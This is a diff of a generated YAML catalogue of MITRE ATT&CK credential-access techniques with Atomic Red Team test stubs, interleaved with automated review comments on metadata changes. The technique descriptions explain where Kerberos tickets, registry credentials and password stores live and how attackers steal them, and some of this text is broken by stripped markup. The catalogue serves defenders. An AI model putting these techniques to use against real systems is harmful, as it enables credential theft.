- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: "Consider monitoring API calls, file read events, and processes
- for suspicious activity that could indicate searching in process memory of
- password managers. \n\nConsider monitoring file reads surrounding known password
- manager applications."
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Access'
- - 'Process: OS API Execution'
- - 'File: File Access'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
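Review bot: for T1555.005 the `external_references` list is reordered (now alphabetical by `source_name` after the `mitre-attack` entry: Cyberreason, FoxIT, ise, KeeThief, NVD) and each entry's `url` now follows `description` instead of preceding it. That is safe as long as references are resolved by `(Citation: …)` name rather than by position, which the description text suggests, but worth confirming. The description and detection text are byte-identical despite `modified` moving from 2022-05-11 to 2024-08-19, and `x_mitre_permissions_required: [User]` is dropped without replacement, consistent with the rest of the change.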
@@ -49543,7 +50189,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests:
- name: Packet Capture macOS using tcpdump or tshark
@@ -49659,7 +50304,7 @@ credential-access:
elevation_required: true
T1552.002:
technique:
- modified: '2023-07-28T18:29:56.525Z'
+ modified: '2024-10-15T16:26:46.873Z'
name: 'Unsecured Credentials: Credentials in Registry'
description: |-
Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -49708,38 +50353,13 @@ credential-access:
url: https://pentestlab.blog/2017/04/19/stored-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.002
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
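Review bot: the T1556.002 metadata removed here (platforms, contributors, id, `created`, both external references) is re-added in the following hunk, so the substantive changes in this hunk are T1552.002's `x_mitre_attack_spec_version` 3.1.0 → 3.2.0 with its `modified` bump, and T1556.002's `modified` 2022-04-25 → 2024-08-21. Note the old layout listed `url` before `source_name` for the Carnal Ownage and Clymb3r references; when checking the re-added entries, compare by `source_name` rather than line order.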
@@ -49763,76 +50383,129 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
- T1558.004:
- technique:
- x_mitre_platforms:
- - Windows
+ T1558.005:
+ technique:
+ modified: '2024-10-14T21:26:37.856Z'
+ name: Ccache Files
+ description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+ credential cache files (or ccache). These files are used for short term storage
+ of a user's active session credentials. The ccache file is created upon user
+ authentication and allows for access to multiple services without the user
+ having to re-enter credentials. \n\nThe /etc/krb5.conf
configuration
+ file and the KRB5CCNAME
environment variable are used to set
+ the storage location for ccache entries. On Linux, credentials are typically
+ stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+ On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+ naming scheme. Typically, users interact with ticket storage using kinit
,
+ which obtains a Ticket-Granting-Ticket (TGT) for the principal; klist
,
+ which lists obtained tickets currently held in the credentials cache; and
+ other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+ Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+ on disk and authenticate as the current user without their password to perform
+ [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+ Adversaries can also use these tickets to impersonate legitimate users with
+ elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+ Tools like Kekeo can also be used by adversaries to convert ccache files to
+ Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+ On macOS, adversaries may use open-source tools or the Kerberos framework
+ to interact with ccache files and extract TGTs or Service Tickets via lower-level
+ APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+ Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Yossi Nisani, Cymptom
- - James Dunn, @jamdunnDFW, EY
- - Swapnil Kumbhar
- - Jacques Pluviose, @Jacqueswildy_IT
- - Dan Nutting, @KerberToast
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Access'
type: attack-pattern
- created: '2020-08-24T13:43:00.028Z'
+ id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+ created: '2024-09-17T15:02:31.324Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1558.004
- url: https://attack.mitre.org/techniques/T1558/004
- - source_name: Harmj0y Roasting AS-REPs Jan 2017
- url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
- description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
- 24, 2020.
- - source_name: Microsoft Kerberos Preauth 2014
- url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
- description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
- It Should Not Be Disabled. Retrieved August 25, 2020.'
- - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
- url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
- description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
- with AS-REP Roasting. Retrieved August 24, 2020.
- - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- source_name: SANS Attacking Kerberos Nov 2014
- url: https://redsiege.com/kerberoast-slides
- - url: https://adsecurity.org/?p=2293
- description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
- Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
- Domain. Retrieved March 22, 2018.
- source_name: AdSecurity Cracking Kerberos Dec 2015
- - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- source_name: Microsoft Detecting Kerberoasting Feb 2018
- - source_name: Microsoft 4768 TGT 2017
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
- description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
- ticket (TGT) was requested. Retrieved August 24, 2020.'
- modified: '2021-06-07T19:23:33.039Z'
+ url: https://attack.mitre.org/techniques/T1558/005
+ external_id: T1558.005
+ - source_name: Binary Defense Kerberos Linux
+ description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+ October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+ APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+ url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+ - source_name: Kerberos GNU/Linux
+ description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+ Compendium (GNU/Linux). Retrieved September 17, 2024.
+ url: https://adepts.of0x.cc/kerberos-thievery-linux/
+ - source_name: Kekeo
+ description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+ url: https://github.com/gentilkiwi/kekeo
+ - source_name: SpectorOps Bifrost Kerberos macOS 2019
+ description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+ Retrieved October 6, 2021.
+ url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+ - source_name: Brining MimiKatz to Unix
+ description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+ Mimikatz et al to UNIX. Retrieved October 13, 2021.
+ url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+ - source_name: Linux Kerberos Tickets
+ description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+ Teams. Retrieved October 4, 2021.
+ url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1558.004:
+ technique:
+ modified: '2024-10-15T15:32:07.850Z'
name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
description: "Adversaries may reveal credentials of accounts that have disabled
Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
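Review bot: the newly added T1558.005 (Ccache Files) description is split across lines in a way that leaves `configuration`, `environment variable are used to set`, and two bare `,` lines without a `+` marker, immediately after `/etc/krb5.conf`, `KRB5CCNAME`, `kinit` and `klist`; those tokens appear to have lost their inline code delimiters, unlike `/tmp` and `krb5cc_%UID%` in the same paragraph, which keep their backticks. Check how the generator handles inline code in descriptions before merging, since the same pattern shows up in the older context lines as well. Also note the new technique ships with `x_mitre_detection: ''` and `atomic_tests: []`, so templates that render the detection field need to tolerate an empty string, and the citation key `Brining MimiKatz to Unix` must stay spelled that way because the description cites it verbatim. The T1558.004 removals at the end of the hunk (platforms, contributors, id, references, `modified`) are reinstated in the next two hunks.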
@@ -49867,6 +50540,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Yossi Nisani, Cymptom
+ - James Dunn, @jamdunnDFW, EY
+ - Swapnil Kumbhar
+ - Jacques Pluviose, @Jacqueswildy_IT
+ - Dan Nutting, @KerberToast
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -49874,32 +50554,68 @@ credential-access:
pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
Microsoft 4768 TGT 2017)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Credential Request'
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Valid domain account
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ created: '2020-08-24T13:43:00.028Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1558/004
+ external_id: T1558.004
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+ - source_name: Harmj0y Roasting AS-REPs Jan 2017
+ description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+ 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+ - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+ description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+ with AS-REP Roasting. Retrieved August 24, 2020.
+ url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
+ - source_name: AdSecurity Cracking Kerberos Dec 2015
+ description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+ Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+ Domain. Retrieved March 22, 2018.
+ url: https://adsecurity.org/?p=2293
+ - source_name: Microsoft 4768 TGT 2017
+ description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+ ticket (TGT) was requested. Retrieved August 24, 2020.'
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+ - source_name: Microsoft Kerberos Preauth 2014
+ description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+ It Should Not Be Disabled. Retrieved August 25, 2020.'
+ url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.004
atomic_tests: []
T1558:
technique:
- modified: '2024-03-01T16:58:02.395Z'
+ modified: '2024-09-17T19:49:11.455Z'
name: Steal or Forge Kerberos Tickets
description: |
Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in klist
utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
- Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb
as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey
. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
- Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf
configuration file and the KRB5CCNAME
environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit
, klist
, ktutil
, and kcc
built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
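Review bot: the T1558 description in this hunk drops the entire Linux ccache paragraph ("Linux systems on Active Directory domains store Kerberos credentials locally ...") and the macOS KCM paragraph ("Kerberos tickets on macOS are stored in a standard ccache format ..."), yet the technique's x_mitre_platforms in the next hunk still list Linux and macOS; confirm this matches the upstream ATT&CK text for the 2024-09-17 modification rather than the generator truncating the literal block. The stray line breaks around the tool names (klist, kinit, ktutil, kcc) and around the /var/lib/sss/secrets paths suggest inline markup was stripped mid-sentence when the description was rendered, which is worth fixing in the exporter so the YAML block stays readable. The T1558.004 changes themselves (x_mitre_permissions_required and spec_version removed; type, id, created, revoked and external_references added; x_mitre_attack_spec_version 3.2.0) are consistent with the rest of the migration.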
@@ -49935,7 +50651,7 @@ credential-access:
- Windows
- Linux
- macOS
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Logon Session: Logon Session Metadata'
@@ -49960,13 +50676,6 @@ credential-access:
description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
using Azure Security Center. Retrieved March 23, 2018.
url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Kekeo
- description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
- url: https://github.com/gentilkiwi/kekeo
- - source_name: SpectorOps Bifrost Kerberos macOS 2019
- description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
- Retrieved October 6, 2021.
- url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
- source_name: Medium Detecting Attempts to Steal Passwords from Memory
description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
from Memory. Retrieved October 11, 2019.
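Review bot: dropping the Kekeo and SpectorOps Bifrost references is consistent with the removal of the T1558 description paragraphs that cited them (both citation markers appear only in the removed Linux and macOS text in the previous hunk), so no dangling (Citation: ...) markers remain in what is visible here. The same check applies to the macOS kerberos framework MIT, MIT ccache, Brining MimiKatz and Linux Kerberos Tickets removals in the following hunks, which cover the remaining citations from those paragraphs.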
@@ -49975,14 +50684,6 @@ credential-access:
description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
Attacks. Retrieved February 27, 2020.
url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
- - source_name: macOS kerberos framework MIT
- description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
- for Macintosh Preferences Documentation. Retrieved October 6, 2021.
- url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
- - source_name: MIT ccache
- description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
- Documentation: Credential Cache. Retrieved October 4, 2021.'
- url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -50004,23 +50705,14 @@ credential-access:
description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
Secret Decoder Ring. Retrieved February 27, 2020.
url: https://adsecurity.org/?p=227
- - source_name: Brining MimiKatz to Unix
- description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
- Mimikatz et al to UNIX. Retrieved October 13, 2021.
- url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
- - source_name: Linux Kerberos Tickets
- description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
- Teams. Retrieved October 4, 2021.
- url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555:
technique:
- modified: '2024-02-26T14:19:09.417Z'
+ modified: '2024-10-15T14:57:46.850Z'
name: Credentials from Password Stores
description: 'Adversaries may search for common password storage locations to
obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -50071,12 +50763,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555
atomic_tests: []
T1552:
technique:
- modified: '2024-04-15T21:33:12.892Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Unsecured Credentials
description: 'Adversaries may search compromised systems to find and obtain
insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -50088,6 +50779,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Austin Clark, @c2defense
x_mitre_deprecated: false
@@ -50102,18 +50794,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Application Log: Application Log Content'
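Review bot: the T1552 platform list replaces Azure AD, Office 365 and Google Workspace with Office Suite and Identity Provider (matching the version bump to 1.4); any per-platform index keyed on the old names will need to be regenerated, and consumers that filter on "Azure AD" or "Google Workspace" will silently get an empty result for this technique. Most of the rest of the hunk is key reordering (x_mitre_attack_spec_version and x_mitre_modified_by_ref move above x_mitre_contributors and x_mitre_platforms, with the old copies deleted in the next hunk), which inflates the diff; emitting keys in a fixed order from the generator would make these updates reviewable.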
@@ -50136,9 +50828,6 @@ credential-access:
url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552
atomic_tests:
- name: AWS - Retrieve EC2 Password Data using stratus
@@ -50206,32 +50895,113 @@ credential-access:
rm -rf stratus*
name: sh
elevation_required: false
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
